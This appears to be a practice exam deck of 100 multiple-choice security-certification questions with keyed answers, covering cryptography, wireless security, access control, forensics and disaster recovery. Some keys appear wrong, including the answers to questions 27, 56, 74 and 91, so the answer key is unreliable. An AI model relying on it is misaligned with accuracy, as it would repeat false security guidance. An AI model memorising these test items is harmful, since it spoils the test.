Deck A

Question 1

Which of the following should the security administrator implement to limit web traffic based on country of origin? (Select THREE).

A. Spam filter

B. Load balancer

C. Antivirus

D. Proxies

E. Firewall

F. NIDS

G. URL filtering

Answer 1

Proxies

Firewall

URL filtering

Question 2

Which of the following is a security advantage of using NoSQL vs. SQL databases in a three-tier environment?

A. NoSQL databases are not vulnerable to XSRF attacks from the application server.

B. NoSQL databases are not vulnerable to SQL injection attacks.

C. NoSQL databases encrypt sensitive information by default.

D. NoSQL databases perform faster than SQL databases on the same hardware.

Answer 2

NoSQL databases are not vulnerable to SQL injection attacks.

Question 3

A technician has implemented a system in which all workstations on the network will receive security updates on the same schedule. Which of the following concepts does this illustrate?

A. Patch management

B. Application hardening

C. White box testing

D. Black box testing

Answer 3

Patch management

Question 4

A system administrator has concerns regarding their users accessing systems and secured areas using others’ credentials. Which of the following can BEST address this concern?

A. Create conduct policies prohibiting sharing credentials.

B. Enforce a policy shortening the credential expiration timeframe.

C. Implement biometric readers on laptops and restricted areas.

D. Install security cameras in areas containing sensitive systems.

Answer 4

Implement biometric readers on laptops and restricted areas.

Question 5

Which of the following is the process in which a law enforcement officer or a government agent encourages or induces a person to commit a crime when the potential criminal expresses a desire not to go ahead?

A. Enticement

B. Entrapment

C. Deceit

D. Sting

Answer 5

Entrapment

Question 6

A user attempting to log on to a workstation for the first time is prompted for the following information before being granted access: username, password, and a four-digit security pin that was mailed to him during account registration. This is an example of which of the following?

A. Dual-factor authentication

B. Multifactor authentication

C. Single factor authentication

D. Biometric authentication

Answer 6

Single factor authentication

Question 7

Peter, the system administrator, has concerns regarding users losing their company provided smartphones. Peter’s focus is on equipment recovery. Which of the following BEST addresses his concerns?

A. Enforce device passwords.

B. Use remote sanitation.

C. Enable GPS tracking.

D. Encrypt stored data.

Answer 7

Enable GPS tracking

Question 8

An incident response team member needs to perform a forensics examination but does not have the required hardware. Which of the following will allow the team member to perform the examination with minimal impact to the potential evidence?

A. Using a software file recovery disc

B. Mounting the drive in read-only mode

C. Imaging based on order of volatility

D. Hashing the image after capture

Answer 8

Mounting the drive in read-only mode

Question 9

A user has several random browser windows opening on their computer. Which of the following programs can be installed on his machine to help prevent this from happening?

A. Antivirus

B. Pop-up blocker

C. Spyware blocker

D. Anti-spam

Answer 9

Pop-up blocker

Question 10

Which of the following would be a reason for developers to utilize an AES cipher in CCM mode (Counter with Chain Block Message Authentication Code)?

A. It enables the ability to reverse the encryption with a separate key

B. It allows for one time pad inclusions with the passphrase

C. Counter mode alternates between synchronous and asynchronous encryption

D. It allows a block cipher to function as a steam cipher

Answer 10

It allows a block cipher to function as a steam cipher

Question 11

A company is looking to improve their security posture by addressing risks uncovered by a recent penetration test. Which of the following risks is MOST likely to affect the business on a day-to-day basis?

A. Insufficient encryption methods

B. Large scale natural disasters

C. Corporate espionage

D. Lack of antivirus software

Answer 11

Lack of antivirus software

Question 12

Which of the following disaster recovery strategies has the highest cost and shortest recovery time?

A. Warm site

B. Hot site

C. Cold site

D. Co-location site

Answer 12

Hot site

Question 13

Jane, the security administrator, sets up a new AP but realizes too many outsiders are able to connect to that AP and gain unauthorized access. Which of the following would be the BEST way to mitigate this issue and still provide coverage where needed? (Select TWO).

A. Disable the wired ports

B. Use channels 1, 4 and 7 only

C. Enable MAC filtering

D. Disable SSID broadcast

E. Switch from 802.11a to 802.11b

Answer 13

Enable MAC filtering

Disable SSID broadcast

Question 14

Peter, the systems administrator, is setting up a wireless network for his team’s laptops only and needs to prevent other employees from accessing it. Which of the following would BEST address this?

A. Disable default SSID broadcasting.

B. Use WPA instead of WEP encryption.

C. Lower the access point’s power settings.

D. Implement MAC filtering on the access point.

Answer 14

Implement MAC filtering on the access point.

Question 15

An organization has a need for security control that identifies when an organizational system has been unplugged and a rouge system has been plugged in. The security control must also provide the ability to supply automated notifications. Which of the following would allow the organization to BEST meet this business requirement?

A. MAC filtering

B. ACL

C. SNMP

D. Port security

Answer 15

Port security

Question 16

At an organization, unauthorized users have been accessing network resources via unused network wall jacks. Which of the following would be used to stop unauthorized access?

A. Configure an access list.

B. Configure spanning tree protocol.

C. Configure port security.

D. Configure loop protection.

Answer 16

Configure port security

Question 17

Which of the following is a best practice when a mistake is made during a forensics examination?

A. The examiner should verify the tools before, during, and after an examination.

B. The examiner should attempt to hide the mistake during cross-examination.

C. The examiner should document the mistake and workaround the problem.

D. The examiner should disclose the mistake and assess another area of the disc.

Answer 17

The examiner should document the mistake and workaround the problem.

Question 18

After recovering from a data breach in which customer data was lost, the legal team meets with the Chief Security Officer (CSO) to discuss ways to better protect the privacy of customer data.
Which of the following controls support this goal?

A. Contingency planning

B. Encryption and stronger access control

C. Hashing and non-repudiation

D. Redundancy and fault tolerance

Answer 18

Encryption and stronger access control

Question 19

Which of the following is true about asymmetric encryption?

A. A message encrypted with the private key can be decrypted by the same key

B. A message encrypted with the public key can be decrypted with a shared key.

C. A message encrypted with a shared key, can be decrypted by the same key.

D. A message encrypted with the public key can be decrypted with the private key.

Answer 19

A message encrypted with the public key can be decrypted with the private key.

Question 20

Establishing a method to erase or clear cluster tips is an example of securing which of the following?

A. Data in transit

B. Data at rest

C. Data in use

D. Data in motion

Answer 20

Data at rest

Question 21

Which of the following security awareness training is BEST suited for data owners who are concerned with protecting the confidentiality of their data?

A. Social networking use training

B. Personally owned device policy training

C. Tailgating awareness policy training

D. Information classification training

Answer 21

Information classification training

Question 22

Which of the following types of cryptography should be used when minimal overhead is necessary for a mobile device?

A. Block cipher

B. Elliptical curve cryptography

C. Diffie-Hellman algorithm

D. Stream cipher

Answer 22

Elliptical curve cryptography

Question 23

Which of the following is the MOST likely cause of users being unable to verify a single user’s email signature and that user being unable to decrypt sent messages?

A. Unmatched key pairs

B. Corrupt key escrow

C. Weak public key

D. Weak private key

Answer 23

Unmatched key pairs

Question 24

A security administrator wishes to increase the security of the wireless network. Which of the following BEST addresses this concern?

A. Change the encryption from TKIP-based to CCMP-based.

B. Set all nearby access points to operate on the same channel.

C. Configure the access point to use WEP instead of WPA2.

D. Enable all access points to broadcast their SSIDs.

Answer 24

Change the encryption from TKIP-based to CCMP-based.

Question 25

Which of the following ports is used to securely transfer files between remote UNIX systems?

A. 21

B. 22

C. 69

D. 445

Answer 25

22

Question 26

A company needs to receive data that contains personally identifiable information. The company requires both the transmission and data at rest to be encrypted. Which of the following achieves this goal? (Select TWO).

A. SSH

B. TFTP

C. NTLM

D. TKIP

E. SMTP

F. PGP/GPG

Answer 26

SSH

PGP/GPG

Question 27

Which of the following is MOST critical in protecting control systems that cannot be regularly patched?

A. Asset inventory

B. Full disk encryption

C. Vulnerability scanning

D. Network segmentation

Answer 27

Full disk encryption

Question 28

Datacenter access is controlled with proximity badges that record all entries and exits from the datacenter. The access records are used to identify which staff members accessed the data center in the event of equipment theft. Which of the following MUST be prevented in order for this policy to be effective?

A. Password reuse

B. Phishing

C. Social engineering

D. Tailgating

Answer 28

Tailgating

Question 29

The use of social networking sites introduces the risk of:

A. Disclosure of proprietary information

B. Data classification issues

C. Data availability issues

D. Broken chain of custody

Answer 29

Disclosure of proprietary information

Question 30

Which of the following concepts allows an organization to group large numbers of servers together in order to deliver a common service?

A. Clustering

B. RAID

C. Backup Redundancy

D. Cold site

Answer 30

Clustering

Question 31

Which of the following wireless security technologies continuously supplies new keys for WEP?

A. TKIP

B. Mac filtering

C. WPA2

D. WPA

Answer 31

TKIP

Question 32

To help prevent unauthorized access to PCs, a security administrator implements screen savers that lock the PC after five minutes of inactivity. Which of the following controls is being described in this situation?

A. Management

B. Administrative

C. Technical

D. Operational

Answer 32

Technical

Question 33

When a communications plan is developed for disaster recovery and business continuity plans, the MOST relevant items to include would be: (Select TWO).

A. Methods and templates to respond to press requests, institutional and regulatory reporting requirements.

B. Methods to exchange essential information to and from all response team members, employees, suppliers, and customers.

C. Developed recovery strategies, test plans, post-test evaluation and update processes.

D. Defined scenarios by type and scope of impact and dependencies, with quantification of loss potential.

E. Methods to review and report on system logs, incident response, and incident handling.

Answer 33

Methods and templates to respond to press requests, institutional and regulatory reporting requirements.

Methods to exchange essential information to and from all response team members, employees, suppliers, and customers.

Question 34

On a train, an individual is watching a proprietary video on Peter’s laptop without his knowledge. Which of the following does this describe?

A. Tailgating

B. Shoulder surfing

C. Interference

D. Illegal downloading

Answer 34

Shoulder surfing

Question 35

A company’s business model was changed to provide more web presence and now its ERM software is no longer able to support the security needs of the company. The current data center will continue to provide network and security services. Which of the following network elements would be used to support the new business model?

A. Software as a Service

B. DMZ

C. Remote access support

D. Infrastructure as a Service

Answer 35

Software as a Service

Question 36

Which of the following network design elements allows for many internal devices to share one public IP address?

A. DNAT

B. PAT

C. DNS

D. DMZ

Answer 36

PAT

Question 37

A malicious individual is attempting to write too much data to an application’s memory. Which of the following describes this type of attack?

A. Zero-day

B. SQL injection

C. Buffer overflow

D. XSRF

Answer 37

Buffer overflow

Question 38

After visiting a website, a user receives an email thanking them for a purchase which they did not request. Upon investigation the security administrator sees the following source code in a pop-up window: “Perform Purchase”

Which of the following has MOST likely occurred?

A. SQL injection

B. Cookie stealing

C. XSRF

D. XSS

Answer 38

XSRF

Question 39

Matt, an IT administrator, wants to protect a newly built server from zero day attacks. Which of the following would provide the BEST level of protection?

A. HIPS

B. Antivirus

C. NIDS

D. ACL

Answer 39

HIPS

Question 40

The system administrator is reviewing the following logs from the company web server:

12: 34:56 GET /directory_listing.php?user=admin&pass=admin1
12: 34:57 GET /directory_listing.php?user=admin&pass=admin2
12: 34:58 GET /directory_listing.php?user=admin&pass=1admin
12: 34:59 GET /directory_listing.php?user=admin&pass=2admin

Which of the following is this an example of?

A. Online rainbow table attack

B. Offline brute force attack

C. Offline dictionary attack

D. Online hybrid attack

Answer 40

Online hybrid attack

Question 41

A new MPLS network link has been established between a company and its business partner.
The link provides logical isolation in order to prevent access from other business partners. Which of the following should be applied in order to achieve confidentiality and integrity of all data across the link?

A. MPLS should be run in IPVPN mode.

B. SSL/TLS for all application flows.

C. IPSec VPN tunnels on top of the MPLS link.

D. HTTPS and SSH for all application flows.

Answer 41

IPSec VPN tunnels on top of the MPLS link.

Question 42

The security manager must store a copy of a sensitive document and needs to verify at a later point that the document has not been altered. Which of the following will accomplish the security manager’s objective?

A. RSA

B. AES

C. MD5

D. SHA

Answer 42

MD5

Question 43

A corporation is looking to expand their data center but has run out of physical space in which to store hardware. Which of the following would offer the ability to expand while keeping their current data center operated by internal staff?

A. Virtualization

B. Subnetting

C. IaaS

D. SaaS

Answer 43

Virtualization

Question 44

A system security analyst using an enterprise monitoring tool notices an unknown internal host exfiltrating files to several foreign IP addresses. Which of the following would be an appropriate mitigation technique?

A. Disabling unnecessary accounts

B. Rogue machine detection

C. Encrypting sensitive files

D. Implementing antivirus

Answer 44

Rogue machine detection

Question 45

Which of the following is BEST used to break a group of IP addresses into smaller network segments or blocks?

A. NAT

B. Virtualization

C. NAC

D. Subnetting

Answer 45

Subnetting

Question 46

One of the most consistently reported software security vulnerabilities that leads to major exploits is:

A. Lack of malware detection.

B. Attack surface decrease.

C. Inadequate network hardening.

D. Poor input validation.

Answer 46

Poor input validation.

Question 47

An auditor’s report discovered several accounts with no activity for over 60 days. The accounts were later identified as contractors’ accounts who would be returning in three months and would need to resume the activities. Which of the following would mitigate and secure the auditors finding?

A. Disable unnecessary contractor accounts and inform the auditor of the update.

B. Reset contractor accounts and inform the auditor of the update.

C. Inform the auditor that the accounts belong to the contractors.

D. Delete contractor accounts and inform the auditor of the update.

Answer 47

Disable unnecessary contractor accounts and inform the auditor of the update.

Question 48

Emily, an application developer, implemented error and exception handling alongside input validation. Which of the following does this help prevent?

A. Buffer overflow

B. Pop-up blockers

C. Cross-site scripting

D. Fuzzing

Answer 48

Buffer overflow

Question 49

Several employees clicked on a link in a malicious message that bypassed the spam filter and their PCs were infected with malware as a result. Which of the following BEST prevents this situation from occurring in the future?

A. Data loss prevention

B. Enforcing complex passwords

C. Security awareness training

D. Digital signatures

Answer 49

Security awareness training

Question 50

Using a heuristic system to detect an anomaly in a computer’s baseline, a system administrator was able to detect an attack even though the company signature based IDS and antivirus did not detect it. Further analysis revealed that the attacker had downloaded an executable file onto the company PC from the USB port, and executed it to trigger a privilege escalation flaw.
Which of the following attacks has MOST likely occurred?

A. Cookie stealing

B. Zero-day

C. Directory traversal

D. XML injection

Answer 50

Zero-day

Question 51

A network administrator has recently updated their network devices to ensure redundancy is in place so that:

A. switches can redistribute routes across the network.

B. environmental monitoring can be performed.

C. single points of failure are removed.

D. hot and cold aisles are functioning.

Answer 51

single points of failure are removed.

Question 52

Customers’ credit card information was stolen from a popular video streaming company. A security consultant determined that the information was stolen, while in transit, from the gaming consoles of a particular vendor. Which of the following methods should the company consider to secure this data in the future?

A. Application firewalls

B. Manual updates

C. Firmware version control

D. Encrypted TCP wrappers

Answer 52

Encrypted TCP wrappers

Question 53

Peter, an employee, is terminated from the company and the legal department needs documents from his encrypted hard drive. Which of the following should be used to accomplish this task? (Select TWO).

A. Private hash

B. Recovery agent

C. Public key

D. Key escrow

E. CRL

Answer 53

Recovery agent

Key escrow

Question 54

Peter, the system administrator, has blocked users from accessing social media web sites. In addition to protecting company information from being accidentally leaked, which additional security benefit does this provide?

A. No competition with the company’s official social presence

B. Protection against malware introduced by banner ads

C. Increased user productivity based upon fewer distractions

D. Elimination of risks caused by unauthorized P2P file sharing

Answer 54

Protection against malware introduced by banner ads

Question 55

The security administrator is currently unaware of an incident that occurred a week ago. Which of the following will ensure the administrator is notified in a timely manner in the future?

A. User permissions reviews

B. Incident response team

C. Change management

D. Routine auditing

Answer 55

Routine auditing

Question 56

An administrator would like to review the effectiveness of existing security in the enterprise. Which of the following would be the BEST place to start?

A. Review past security incidents and their resolution

B. Rewrite the existing security policy

C. Implement an intrusion prevention system

D. Install honey pot systems

Answer 56

Implement an intrusion prevention system

Question 57

A system administrator wants to enable WPA2 CCMP. Which of the following is the only encryption used?

A. RC4

B. DES

C. 3DES

D. AES

Answer 57

AES

Question 58

A security administrator has just finished creating a hot site for the company. This implementation relates to which of the following concepts?

A. Confidentiality

B. Availability

C. Succession planning

D. Integrity

Answer 58

Availability

Question 59

Emily, a company’s security officer, often receives reports of unauthorized personnel having access codes to the cipher locks of secure areas in the building. Emily should immediately implement which of the following?

A. Acceptable Use Policy

B. Physical security controls

C. Technical controls

D. Security awareness training

Answer 59

Security awareness training

Question 60

A new virtual server was created for the marketing department. The server was installed on an existing host machine. Users in the marketing department report that they are unable to connect to the server. Technicians verify that the server has an IP address in the same VLAN as the marketing department users. Which of the following is the MOST likely reason the users are unable to connect to the server?

A. The new virtual server’s MAC address was not added to the ACL on the switch

B. The new virtual server’s MAC address triggered a port security violation on the switch

C. The new virtual server’s MAC address triggered an implicit deny in the switch

D. The new virtual server’s MAC address was not added to the firewall rules on the switch

Answer 60

The new virtual server’s MAC address was not added to the ACL on the switch

Question 61

Matt, a security consultant, has been tasked with increasing server fault tolerance and has been given no budget to accomplish his task. Which of the following can Matt implement to ensure servers will withstand hardware failure?

A. Hardware load balancing

B. RAID

C. A cold site

D. A host standby

Answer 61

RAID

Question 62

Which of the following security account management techniques should a security analyst implement to prevent staff, who has switched company roles, from exceeding privileges?

A. Internal account audits

B. Account disablement

C. Time of day restriction

D. Password complexity

Answer 62

Internal account audits

Question 63

Which of the following would the security engineer set as the subnet mask for the servers below to utilize host addresses on separate broadcast domains?
Server 1: 192.168.100.6
Server 2: 192.168.100.9
Server 3: 192.169.100.20

A. /24

B. /27

C. /28

D. /29

E. /30

Answer 63

/29

Question 64

Disabling unnecessary services, restricting administrative access, and enabling auditing controls on a server are forms of which of the following?

A. Application patch management

B. Cross-site scripting prevention

C. Creating a security baseline

D. System hardening

Answer 64

System hardening

Question 65

Which of the following is best practice to put at the end of an ACL?

A. Implicit deny

B. Time of day restrictions

C. Implicit allow

D. SNMP string

Answer 65

Implicit deny

Question 66

Some customers have reported receiving an untrusted certificate warning when visiting the company’s website. The administrator ensures that the certificate is not expired and that customers have trusted the original issuer of the certificate. Which of the following could be causing the problem?

A. The intermediate CA certificates were not installed on the server.

B. The certificate is not the correct type for a virtual server.

C. The encryption key used in the certificate is too short.

D. The client’s browser is trying to negotiate SSL instead of TLS

Answer 66

The intermediate CA certificates were not installed on the server.

Question 67

An administrator configures all wireless access points to make use of a new network certificate authority. Which of the following is being used?

A. WEP

B. LEAP

C. EAP-TLS

D. TKIP

Answer 67

EAP-TLS

Question 68

Which of the following application attacks is used against a corporate directory service where there are unknown servers on the network?

A. Rogue access point

B. Zero day attack

C. Packet sniffing

D. LDAP injection

Answer 68

LDAP injection

Question 69

A large multinational corporation with networks in 30 countries wants to establish an understanding of their overall public-facing network attack surface. Which of the following security techniques would be BEST suited for this?

A. External penetration test

B. Internal vulnerability scan

C. External vulnerability scan

D. Internal penetration test

Answer 69

External vulnerability scan

Question 70

While opening an email attachment, Peter, a customer, receives an error that the application has encountered an unexpected issue and must be shut down. This could be an example of which of the following attacks?

A. Cross-site scripting

B. Buffer overflow

C. Header manipulation

D. Directory traversal

Answer 70

Buffer overflow

Question 71

Jane, a VPN administrator, was asked to implement an encryption cipher with a MINIMUM effective security of 128-bits. Which of the following should Jane select for the tunnel encryption?

A. Blowfish

B. DES

C. SHA256

D. HMAC

Answer 71

Blowfish

Question 72

It is MOST important to make sure that the firewall is configured to do which of the following?

A. Alert management of a possible intrusion.

B. Deny all traffic and only permit by exception.

C. Deny all traffic based on known signatures.

D. Alert the administrator of a possible intrusion.

Answer 72

Deny all traffic and only permit by exception.

Question 73

A security administrator is notified that users attached to a particular switch are having intermittent connectivity issues. Upon further research, the administrator finds evidence of an ARP spoofing attack. Which of the following could be utilized to provide protection from this type of attack?

A. Configure MAC filtering on the switch.

B. Configure loop protection on the switch.

C. Configure flood guards on the switch.

D. Configure 802.1x authentication on the switch.

Answer 73

Configure flood guards on the switch.

Question 74

The IT department has setup a share point site to be used on the intranet. Security has established the groups and permissions on the site. No one may modify the permissions and all requests for access are centrally managed by the security team. This is an example of which of the following control types?

A. Rule based access control

B. Mandatory access control

C. User assigned privilege

D. Discretionary access control

Answer 74

Discretionary access control

Question 75

Which of the following is required to allow multiple servers to exist on one physical server?

A. Software as a Service (SaaS)

B. Platform as a Service (PaaS)

C. Virtualization

D. Infrastructure as a Service (IaaS)

Answer 75

Virtualization

Question 76

An organization is required to log all user internet activity. Which of the following would accomplish this requirement?

A. Configure an access list on the default gateway router. Configure the default gateway router to log all web traffic to a syslog server

B. Configure a firewall on the internal network. On the client IP address configuration, use the IP address of the firewall as the default gateway, configure the firewall to log all traffic to a syslog server

C. Configure a proxy server on the internal network and configure the proxy server to log all web traffic to a syslog server

D. Configure an access list on the core switch, configure the core switch to log all web traffic to a syslog server

Answer 76

Configure a proxy server on the internal network and configure the proxy server to log all web traffic to a syslog server

Question 77

When employees that use certificates leave the company they should be added to which of the following?

A. PKI

B. CA

C. CRL

D. TKIP

Answer 77

CRL

Question 78

A company would like to take electronic orders from a partner; however, they are concerned that a non-authorized person may send an order. The legal department asks if there is a solution that provides non-repudiation. Which of the following would meet the requirements of this scenario?

A. Encryption

B. Digital signatures

C. Steganography

D. Hashing

E. Perfect forward secrecy

Answer 78

Digital signatures

Question 79

An overseas branch office within a company has many more technical and non-technical security incidents than other parts of the company. Which of the following management controls should be introduced to the branch office to improve their state of security?

A. Initial baseline configuration snapshots

B. Firewall, IPS and network segmentation

C. Event log analysis and incident response

D. Continuous security monitoring processes

Answer 79

Continuous security monitoring processes

Question 80

A network administrator identifies sensitive files being transferred from a workstation in the LAN to an unauthorized outside IP address in a foreign country. An investigation determines that the firewall has not been altered, and antivirus is up-to-date on the workstation. Which of the following is the MOST likely reason for the incident?

A. MAC Spoofing

B. Session Hijacking

C. Impersonation

D. Zero-day

Answer 80

Zero-day

Question 81

A security technician is working with the network firewall team to implement access controls at the company’s demarc as part of the initiation of configuration management processes. One of the network technicians asks the security technician to explain the access control type found in a firewall. With which of the following should the security technician respond?

A. Rule based access control

B. Role based access control

C. Discretionary access control

D. Mandatory access control

Answer 81

Rule based access control

Question 82

During a security assessment, an administrator wishes to see which services are running on a remote server. Which of the following should the administrator use?

A. Port scanner

B. Network sniffer

C. Protocol analyzer

D. Process list

Answer 82

Port scanner

Question 83

A security administrator wants to perform routine tests on the network during working hours when certain applications are being accessed by the most people. Which of the following would allow the security administrator to test the lack of security controls for those applications with the least impact to the system?

A. Penetration test

B. Vulnerability scan

C. Load testing

D. Port scanner

Answer 83

Vulnerability scan

Question 84

Digital certificates can be used to ensure which of the following? (Select TWO).

A. Availability

B. Confidentiality

C. Verification

D. Authorization

E. Non-repudiation

Answer 84

Confidentiality

Non-repudiation

Question 85

The Chief Technical Officer (CTO) has tasked The Computer Emergency Response Team (CERT) to develop and update all Internal Operating Procedures and Standard Operating Procedures documentation in order to successfully respond to future incidents. Which of the following stages of the Incident Handling process is the team working on?

A. Lessons Learned

B. Eradication

C. Recovery

D. Preparation

Answer 85

Preparation

Question 86

A malicious user is sniffing a busy encrypted wireless network waiting for an authorized client to connect to it. Only after an authorized client has connected and the hacker was able to capture the client handshake with the AP can the hacker begin a brute force attack to discover the encryption key. Which of the following attacks is taking place?

A. IV attack

B. WEP cracking

C. WPA cracking

D. Rogue AP

Answer 86

WPA cracking

Question 87

Which of the following offers the LEAST secure encryption capabilities?

A. TwoFish

B. PAP

C. NTLM

D. CHAP

Answer 87

PAP

Question 88

Visitors entering a building are required to close the back door before the front door of the same entry room is open. Which of the following is being described?

A. Tailgating

B. Fencing

C. Screening

D. Mantrap

Answer 88

Mantrap

Question 89

Which of the following is BEST used to capture and analyze network traffic between hosts on the same network segment?

A. Protocol analyzer

B. Router

C. Firewall

D. HIPS

Answer 89

Protocol analyzer

Question 90

Which of the following protocols is vulnerable to man-in-the-middle attacks by NOT using end to end TLS encryption?

A. HTTPS

B. WEP

C. WPA

D. WPA 2

Answer 90

WEP

Question 91

Mike, a network administrator, has been asked to passively monitor network traffic to the company’s sales websites. Which of the following would be BEST suited for this task?

A. HIDS

B. Firewall

C. NIPS

D. Spam filter

Answer 91

NIPS

Question 92

Users report that they are unable to access network printing services. The security technician checks the router access list and sees that web, email, and secure shell are allowed. Which of the following is blocking network printing?

A. Port security

B. Flood guards

C. Loop protection

D. Implicit deny

Answer 92

Implicit deny

Question 93

The concept of rendering data passing between two points over an IP based network impervious to all but the most sophisticated advanced persistent threats is BEST categorized as which of the following?

A. Stream ciphers

B. Transport encryption

C. Key escrow

D. Block ciphers

Answer 93

Transport encryption

Question 94

A CRL is comprised of.

A. Malicious IP addresses.

B. Trusted CA’s.

C. Untrusted private keys.

D. Public keys.

Answer 94

Public keys

Question 95

Used in conjunction, which of the following are PII? (Select TWO).

A. Marital status

B. Favorite movie

C. Pet’s name

D. Birthday

E. Full name

Answer 95

Birthday

Full name

Question 96

A security administrator must implement a network that is immune to ARP spoofing attacks. Which of the following should be implemented to ensure that a malicious insider will not be able to successfully use ARP spoofing techniques?

A. UDP

B. IPv6

C. IPSec

D. VPN

Answer 96

IPv6

Question 97

Which of the following is a programming interface that allows a remote computer to run programs on a local machine?

A. RPC

B. RSH

C. SSH

D. SSL

Answer 97

RPC

Question 98

Which of the following would Peter, a security administrator, do to limit a wireless signal from penetrating the exterior walls?

A. Implement TKIP encryption

B. Consider antenna placement

C. Disable the SSID broadcast

D. Disable WPA

Answer 98

Consider antenna placement

Question 99

The Chief Information Officer (CIO) wants to implement a redundant server location to which the production server images can be moved within 48 hours and services can be quickly restored, in case of a catastrophic failure of the primary datacenter’s HVAC. Which of the following can be implemented?

A. Cold site

B. Load balancing

C. Warm site

D. Hot site

Answer 99

Warm site

Question 100

A recent intrusion has resulted in the need to perform incident response procedures. The incident response team has identified audit logs throughout the network and organizational systems which hold details of the security breach. Prior to this incident, a security consultant informed the company that they needed to implement an NTP server on the network. Which of the following is a problem that the incident response team will likely encounter during their assessment?

A. Chain of custody

B. Tracking man hours

C. Record time offset

D. Capture video traffic

Answer 100

Record time offset